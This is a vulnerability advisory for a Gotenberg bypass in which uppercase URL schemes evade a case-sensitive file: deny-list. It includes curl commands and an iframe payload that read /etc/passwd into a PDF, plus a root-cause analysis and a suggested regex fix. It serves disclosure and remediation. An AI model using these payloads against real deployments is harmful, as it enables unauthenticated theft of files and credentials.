CVE-2026-27018

Impact

The fix introduced in version 8.1.0 for GHSA-rh2x-ccvw-q7r3 (CVE-2024-21527) can be bypassed using mixed-case or uppercase URL schemes.

The default --chromium-deny-list value is ^file:(?!//\/tmp/).*. This regex is anchored to lowercase file: at the start. However, per RFC 3986 Section 3.1, URI schemes are case-insensitive. Chromium normalizes the scheme to lowercase before navigation, so a URL like FILE:///etc/passwd or File:///etc/passwd bypasses the deny-list check but still gets resolved by Chromium as file:///etc/passwd.

The root cause is in pkg/gotenberg/filter.go — the FilterDeadline function compiles the deny-list regex with regexp2.MustCompile(denied.String(), 0), where 0 means no flags (case-sensitive). Since the regex pattern itself doesn't include a (?i) flag, matching is strictly case-sensitive.

This affects both the URL endpoint and HTML conversion (via iframes, link tags, etc.).

Steps to Reproduce

1. Start Gotenberg with default settings:

docker run --rm -p 3000:3000 gotenberg/gotenberg:8.26.0 gotenberg

1. Read /etc/passwd via the URL endpoint using an uppercase scheme:

curl -X POST 'http://localhost:3000/forms/chromium/convert/url' \
  --form 'url=FILE:///etc/passwd' -o output.pdf

1. Open output.pdf — it contains the contents of /etc/passwd.
2. Alternatively, create an index.html:

<iframe src="FILE:///etc/passwd" width="100%" height="100%"></iframe>

Then convert it:

curl -X POST 'http://localhost:3000/forms/chromium/convert/html' \
  -F 'files=@index.html' -o output.pdf

1. The resulting PDF contains /etc/passwd contents.

Mixed-case variants like File:, fILE:, fiLE: etc. all work as well.

Root Cause

• pkg/modules/chromium/chromium.go defines the default deny-list as ^file:(?!//\/tmp/).*
• pkg/gotenberg/filter.go compiles this with regexp2.MustCompile(denied.String(), 0) — flag 0 means case-sensitive
• pkg/modules/chromium/events.go uses FilterDeadline to check intercepted request URLs against the deny-list
• Chromium normalizes URL schemes to lowercase, so FILE:///etc/passwd becomes file:///etc/passwd after the deny-list check has already passed

Suggested Fix

Change the default deny-list regex to use a case-insensitive flag:

(?i)^file:(?!//\/tmp/).*

Or apply case-insensitive matching in FilterDeadline when compiling the regex.

Severity

This is effectively the same impact as CVE-2024-21527 — unauthenticated arbitrary file read from the Gotenberg container. An attacker can leak environment variables, configuration, credentials, and other sensitive data.